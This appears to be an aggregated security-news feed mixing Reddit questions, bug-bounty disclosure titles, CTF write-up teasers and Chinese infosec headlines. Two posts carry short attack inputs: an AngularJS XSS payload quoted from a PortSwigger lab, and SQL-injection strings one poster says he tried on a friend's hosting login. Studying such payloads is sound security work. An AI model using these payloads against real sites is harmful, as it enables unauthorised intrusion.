    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in sent, and I don't see anything unusual in drafts or sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce back email had my address as the sender, but the contact name on it was just random letters, not my name that I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD [link] [comments]
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years(stay at home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level(had 5yrs exp) and decided Cybersecurity was the way to go. I did not have a tech degree, or any other certs and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC focused sys admin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything, SCCM, AWS, Azure, GCP, VmWare, Citrix, C…
    Using Quantitative Risk Metrics to get Csuite buy in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound in that a value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company so investing w to reduce risk is basic math the c-suite can get. My barriers to this are: Getting an effective asset valuation as no one seems to track initial investment and sustainment costs let alone cyber security costs. Building this into SOP when tagging assets. Tagging right now is limited so this needs to be fixed too. Anyone here effectively put in quantitative risk practice that can share what worked? submitted by /u/finnthethird [link] [comments]
    what's the deal about ip addresses?
    I know this is so fundamental basic stuff but why is this thing so crucial? submitted by /u/alicia30765 [link] [comments]
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler [link] [comments]
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47: a top-tier backdoor of the US NSA Equation Group, technical details by ourren; For more of the latest articles, visit SecWiki
  • Open

    Deliviry Club Courier app (v. 3.9.25.0); Disclosure phone number of client.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add upto 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000
  • Open

    Attackers Use Qbot and the Zerologon Vulnerability to Infect an Entire Domain
    Translator: Knownsec 404 Lab translation team. Original link: https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ In this intrusion (which began in November 2021), an attacker gained an initial foothold in the environment using the Qbot (aka Quakbot/Qakbot) malware. Shortly after the Qbot payload executed...
    Chrome V8 Source Code: Why "Equal" and "StrictEqual" Differ
    Author: 灰豆. This article is an author submission; Seebug Paper looks forward to your contributions, and every accepted submission earns a gift! Submission email: paper@seebug.org Introduction: substring, getDate, catch and the like are commonly used JavaScript APIs. The next few articles will explain the design ideas, source code and key functions of the APIs in V8, and use examples to explain how JavaScript is initialized and run in V8, as well as how it relates to...
  • Open

    Types of attacks I have learned
    Man in the middle attack Continue reading on Medium »
  • Open

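    Study Shows Fast-Growing Companies Face Higher Risk of Being Hacked
    According to the latest research from Beyond Identity, a US provider of a passwordless identity platform, fast-growing companies are more likely to suffer attacks exploiting cybersecurity vulnerabilities than companies with flat growth rates.
    91% of UK Organizations Hit by Email Phishing Attacks in 2021
    According to Proofpoint's 2022 report on the state of phishing, more than nine in ten (91%) UK organizations were successfully compromised by email phishing last year.
    Would You Fall for a Phishing Email Like This?
    Phishing emails are everywhere; guarding against them means keeping your eyes open.
    Beware: Google MFA Cannot Stop This Type of Phishing Attack
    A new type of phishing attack can bypass MFA: the attacker uses a VNC screen-sharing system to have the target user log in to their account directly on a server the attacker controls, which bypasses MFA.
    15 Days to Go! The CIS2021 Spring Edition Livestream Invites You to Meet Online
    On March 9, join us for the online livestream. Be there!
    FreeBuf Morning Report | DDoS Attacks Spiraled Upward in 2021; Sea Mar Accused of Negligence over Data Breach
    Neustar Security Services released a report detailing the continued growth of cyberattacks in 2021, with an unprecedented number of DDoS attacks.
    The State of the Telecom Fraud Black and Gray Market Chain (Part 3): Contract-Free Payment, Collection-on-Behalf and Payment-on-Behalf Techniques Become the Mainstream Money-Laundering Methods for Fraud
    In scams such as fake online money-making and fake investment schemes, victims readily trust the other party because, early in the scam, they do receive task commissions paid back by the scammer.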
  • Open

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0

  • Open

    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis. The post Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis appeared first on Unit42.
  • Open

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put SIM in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new SIM and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible someone put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increased surge of work of a new contract, my company needs penetration tester contractors which would be good to use on an ad-hoc basis. What are the typical rates for pentesters and how long does a typical contract go on for? E.g. £500 a day for 3 months for example for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like Cyber Essentials and CREST. It would be great if someone can share some figures so I can know what to expect with varying experience and qualification such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors, I have been wondering what improvements vendors and OEMs have made on the SIEM onboarding front. Do OEMs/vendors still prefer/recommend syslog, installing proprietary agents or the oh so obsolete RPC (for Windows) to onboard systems, or have some vendors/OEMs also started pushing for cloud native solutions like Event Hub/SQS? A lot of vendors do show a green light on integration with S3/Event Hub but don't support any sort of parsing for these log sources (Windows and Linux); one cannot expect anyone to actually create parsers from scratch for the entire Windows ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
    Let's get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone). Let's say I'm at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do I turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest to turn on VPN on the laptop. My question then is, what if I would like to browse the internet on my phone? Or do stuff on WhatsApp, etc. Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, a friend of mine has set up a website where she used a hosting service, I don't remember its name. The admin login functionality from that hosting service asked for username and password combination. I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing login password/username incorrect error, it showed pretty unusual error and took pretty long to do so. Is that a sign of SQL based injection? Does that mean the website is likely vulnerable to SQL injection or smtg similar? Please help, because that friend of mine has set up her website for business usage and isn't sure that hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks, for example: enrich alerts with virus total intelligence; test and verify DLP configuration is set up correctly; add IP to block list in AWS WAF; pull metrics from crowd strike to PowerBI for manager report; etc. I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]
  • Open

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately for details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume, I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did submitted by /u/KTthemajicgoat [link] [comments]
  • Open

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »
  • Open

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965
  • Open

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    you may have seen some SQL injections that exploiting them are not as straightforward as what you see in the ethical hacking courses. like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB SOLUTIONS
    XXE (XML External Entity) Injection enables an attacker to inject or modify XML data in a web application… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »
  • Open

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]
  • Open

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victim’s desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com If your website is redirecting visitors to pages that look something like this then your website is likely compromised: In today’s post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.
  • Open

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]
  • Open

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has rick & morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's images ect... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-02-22 Review
    An Introduction to and Survey of Device Fingerprinting Techniques (Part 1) by ourren. For more of the latest articles, visit SecWiki
  • Open

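    panic: send on closed channel - Let's Close Channels Properly 🕵🏼‍♂️
    Goroutines and channels are among the most essential features of golang. However, if you use them without checking carefully, they can cause a variety of problems. One of these is sending a value to a closed channel, in which case the application terminates with a panic. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc There is a simple way to prevent this: before sending a value to the channel, check whether the channel is closed, as in the safeCheck function below, and decide whether to send the value based on the result.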
  • Open

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE
  • Open

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

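    State Council Issues the "Opinions of the General Office of the State Council on Accelerating the Expansion of Application Areas for Electronic Licenses and Certificates and Their Nationwide Interoperability and Mutual Recognition"
    The Opinions comprise five chapters and eighteen articles. They coordinate development and security, strengthen standardized management across the whole process of electronic license use, strictly protect trade secrets and personal information, and build a solid security line of defense for electronic license applications.
    New Banking Trojan Is Attacking UK Bank Users via the Google Play Store
    Researchers at Dutch security firm Threat Fabric have discovered a new Android banking trojan named Xenomorph that is targeting users of 56 European banks.
    FreeBuf Morning Report | Meta May Exit Europe over Data Transfer Difficulties; Online Litigation and Other Judicial Activities Must Protect Personal Privacy
    Meta has received a "revised" preliminary decision from its lead EU privacy regulator that could affect its transfers of EU user data to the United States, and it may even exit the European market as a result.
    Managing the Lifecycle of Non-Human Accounts to Minimize Cyberattacks
    In many organizations, the access rights of non-human accounts usually remain unchanged. This gives cybercriminals the opportunity to use orphaned accounts to gain unauthorized access and launch cyberattacks.
    Dozens of OpenSea Users Have NFTs Stolen, with Losses Exceeding $1.7 Million
    Dozens of OpenSea users were hit by a phishing attack and lost NFTs worth about $1.7 million.
    Android Users Beware! Hackers Use "Disposable" Accounts to Run Scams
    A rogue botnet-based website is linked to thousands of infected Android phones, once again exposing the weakness of relying on SMS for account verification.
    Watch the CIS 2021 Conference Spring Edition Livestream on March 9 for Giveaway after Giveaway!
    On March 9-10, the full-agenda livestream of CIS 2021 Spring Edition will officially begin, and giveaway activities will go live ahead of time; participants can win prizes up to an iPhone13!
    Cookware Giant Meyer Discloses Cyberattack Affecting Employees
    Meyer Corporation, the world's second-largest cookware distributor, disclosed to the US attorney general's office a data breach affecting thousands of its employees.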
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Iranian-Aligned Threat Actor TunnelVision Actively Exploiting the Log4j2 Vulnerability in VMware Horizon
    Translator: Knownsec 404 Lab translation team. Original link: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ Summary: SentinelLabs has been tracking an Iranian-aligned attacker operating in the Middle East and the United States. ...

  • Open

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and it's been fun. I got to use the under-the-door tool, tailgate, clone RFID card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had “keys to the kingdom” such as the server room or someone's desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get the basic understanding on the remote process memory read and write all by windows 32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    ​I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on portswigger when I came across this js payload could anyone please explain me how it works [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language; Falcon Query Language; Microsoft Kusto; Rapid7 Log Entry Query Language. Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that I am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is, the password reset link for Instagram was sent to my phone from the same number as the verification link for Amazon. The number is something like 78549659. Is this normal or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing BSc in Information systems and want to do masters in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes that take “months long investigation”. Why does it take months long if they already have so called evidence especially if they have received tips on it from organizations such as NCMEC submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki Weekly (Issue 416) by ourren; An Introduction to the Vulnerability Exploitability eXchange (VEX) by ourren; PAM 2022 List of Accepted Papers by ourren. For more of the latest articles, visit SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

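    FreeBuf Morning Report | Douban Revealed to Embed Sensitive Personal Information in In-App Screenshots; Attackers Distribute Trojans Using NFT Topics
    Douban was revealed to use hard-to-notice invisible watermarks in its pages; the watermark information includes the user's UID, TID and the full time with time zone.
    华云安 ASM Technical Series: A Detection Model for Responding to Zero-Day Attacks (VEAM)
    At least 66 zero-day vulnerabilities in active use were found in 2021, roughly double the number in 2020.
    Users of UK Digital Bank Monzo Are Under Threat from Phishing
    UK digital banking platform Monzo is being targeted by phishing attacks, with users receiving text messages containing phishing links.
    NFTs Worth Millions of Dollars Stolen in Attack; Google Issues Urgent Warning to 3.2 Billion Users Worldwide | Global Cybersecurity Highlights for February 21
    Global cybersecurity highlights for February 21.
    Latest Report | Sangfor 2021 Ransomware Landscape Report
    The latest report is out!
    White House Pins Ukraine DDoS Attacks on Russian GRU Hackers
    The recent DDoS attacks in Ukraine are alleged to be Russian-led hacking attacks.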
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    Database Connection Exploitation Tool -- Sylas
    Author: ryze@nop. This article is an author submission; Seebug Paper looks forward to your contributions, and every accepted submission earns a gift! Submission email: paper@seebug.org 0x00 Preface: This started on a red team project where, after obtaining an Oracle database password and connecting with a database exploitation tool from Github, running commands such as tasklist /svc and net user produced the error ORA-24345: 出现截断或空读取错误, and the file management func...
    Oracle WebLogic CVE-2022-21350 Vulnerability Analysis
    Author: 墨云科技 VLab Team. Original link: https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ Vulnerability overview: This is a deserialization vulnerability, a new gadget, which may pose an RCE risk on lower JDK versions. Vulnerability analysis: The test environment is weblogic14c, tested with JDK 1.8. First, the call goes to BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

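    Using Dynamic Time Warping (DTW) for Time-Series Similarity Measurement and Similarity Analysis of Upstream and Downstream River Pollution Concentrations - 鸣梦
    Time-series similarity measures The common methods for measuring time-series similarity are Euclidean distance (ED) and Dynamic Time Warping (DTW). They fall into two broad categories: lock-step measures and elastic measures. Lock-step measures are  ( 1 min )
    Be Careful When Opening Online PDFs - 踩刀诗人
    This post is really a small supplement to my earlier security remediation topic; if you are interested in the earlier content, use these shortcuts: Security Vulnerability Remediation Series (2) Security Vulnerability Remediation Series (1) Background Not long ago a customer ran another round of security testing on the system we provide. One finding struck me as very interesting and changed what I thought I knew: "PDF preview is vulnerable to XSS injection". I am sharing it here, which is also a way for us to
    What Does a CTO (Technical Director) Actually Do Day to Day? - 程序员守护石
    I am currently running a startup. At my last company, a medical technology firm, I was general manager of the R&D center, and before that I held R&D/technical director positions at several companies. As far as I understand it, small and medium-sized companies in China do not currently draw a clear functional distinction between the CTO and technical director roles. 1. Summary first Let me first summarize the role of a CTO/technical director: ❶ A CTO/technical director should have overall command of the company's technical direction, and
    How SparkSql Supports the Enterprise Data Warehouse - 字节跳动数据平台
    When designing and selecting an enterprise data warehouse architecture, you need to consider several dimensions: development convenience, ecosystem, degree of decoupling, performance, and security. Author: 惊帆, from the Data Platform EMR team Preface After years of development, Apache Hive has essentially become the industry's de facto standard and data processing tool for building very large-scale data warehouses. Hive is no longer just a technical component but a design  ( 4 min )
    WeChat First-Round Interview: What Is Consistent Hashing? Where Is It Used? What Problem Does It Solve? - 小林coding
    Hi everyone, I'm 小林. While browsing interview write-ups on 牛客网, I found that one candidate interviewing at WeChat was asked this question: The very first question was: what is consistent hashing, where is it used, and what problem does it solve? It is quite an interesting question, so let's talk about it today. Let's go! How are requests distributed? Most websites are certainly backed by more than one server, because the concurrency and data volume of a single machine are limited  ( 1 min )
    How to Integrate Huawei Cloud Functions in Flutter - 华为开发者论坛
    Introduction Cloud Functions is a Serverless computing service that provides FaaS (Function as a Service) capabilities. It helps developers greatly simplify application development and operations work, lowers the barrier to implementing application features, and lets them build business capabilities quickly. The following describes how to integrate Cloud Functions in the Flutter framework. Integration steps 1. Install the flutter env  ( 1 min )
    JVM Fundamentals (2): Memory Allocation Strategies and Garbage Collection Techniques - Huangzzzzz
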